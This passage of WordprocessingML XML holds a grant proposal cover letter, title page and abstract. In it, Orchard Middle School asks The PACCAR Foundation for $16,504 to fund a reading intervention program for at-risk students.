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60ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="Page1"/>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>10/19/2016</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Mr. Ken Hastings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Director of Investor Relations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>The PACCAR Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00F72BE7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>777 106</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> Ave N.E.</w:t>
      </w:r>
      <w:r w:rsidR="00F72BE7" w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Bellevue, WA 98004</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="345" w:right="51" w:firstLine="720"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">READ TO SUCCEED! PROJECT  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Dear Mr. Hastings, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Orchard Middle School is pleased to present this proposal for your review. We look forward to partnering with you to provide a reading intervention program for our students with poor reading skills called Read to Succeed! Orchard Middle School has over 50 at risk students with a reading performance of at least two years behind their current grade level. The objective of the Read to Succeed! program is to help all students with poor reading skills learn to read at grade level and increase their reading speed, comprehension, and reading attention span. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">During the last year, we have been piloting the Read to Succeed! program with a small group of students with poor reading skills and have seen dramatic improvements with most of the students increasing their reading ability by one to two grade levels. The Read to Succeed! program provides students with access to assistive reading systems, along with training for classroom teachers and reading specialists.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">We have seen measurable success and we are now seeking to expand our Read to Succeed! program to address the needs of all the at risk students in the Orchard Middle School. Our proposal requests $16,504 in funding to obtain the software, hardware, and training necessary to equip the Orchard Middle School resource room with five assistive reading systems, each including a computer, scanner and assistive reading software. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">We appreciate The PACCAR Foundation taking an interest in helping our students develop their reading skills through our new reading program! Please let me know if you require any further information or have any questions concerning this proposal. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Thank you, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="199" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Adam Kunz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Special Education Coordinator </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1075" w:right="6005"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Orchard Middle School </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>235 Sunset Ave.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t>Wenatchee, WA 98801</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="670" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="22" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="6926" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="461" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Read to Succeed!  Improving </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="52" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading Performance for At Risk Students </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="15" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:i/>
          <w:vanish/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="209" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Submitted to: The PACCAR Foundation </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="200" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="209" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: October 19, 2016 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="201" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="199" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="4" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Adam Kunz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="4" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Special Education Coordinator </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="4" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="1075" w:right="5502"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Orchard Middle School </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="4" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="1075" w:right="5502"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">235 Sunset Ave. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="4" w:line="250" w:lineRule="auto"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Wenatchee, WA 98801</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-30" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="427" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1532" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="83" w:line="241" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="83" w:line="241" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Read to Succeed!  Improving Reading Performance for At Risk Students </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="121" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:vanish/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">Project Abstract </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="1075"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="373"/>
        <w:ind w:left="1075" w:right="51"/>
        <w:rPr>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72BE7">
        <w:rPr>
          <w:vanish/>
        </w:rPr>
        <w:t xml:space="preserve">The Orchard Middle School, in Wenatchee, WA is seeking a grant to expand our Read to Succeed! program with the objective of helping all of our at risk students increase their reading skills and to read at grade level using the same classroom textbooks and materials as their peers. The objective is that by the end of the year the students will have at least doubled their reading speed and will have improved their reading skills by one to two grade levels. The Read to Succeed! program is based on the latest research on effective reading instruction. Funding in the amount of $16,504 is requested for staff training and to purchase the required software and hardware for the school’s resource room. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760ACB" w:rsidRPr="00F72BE7" w:rsidRDefault="00760ACB" w:rsidP="00760ACB">
      <w:pPr>
        <w:spacing w:after="373"/>
        <w:ind w:left="1065" w:right="51" w:firstLine="0"/>
        <w:rPr>
          <w:vanish/>
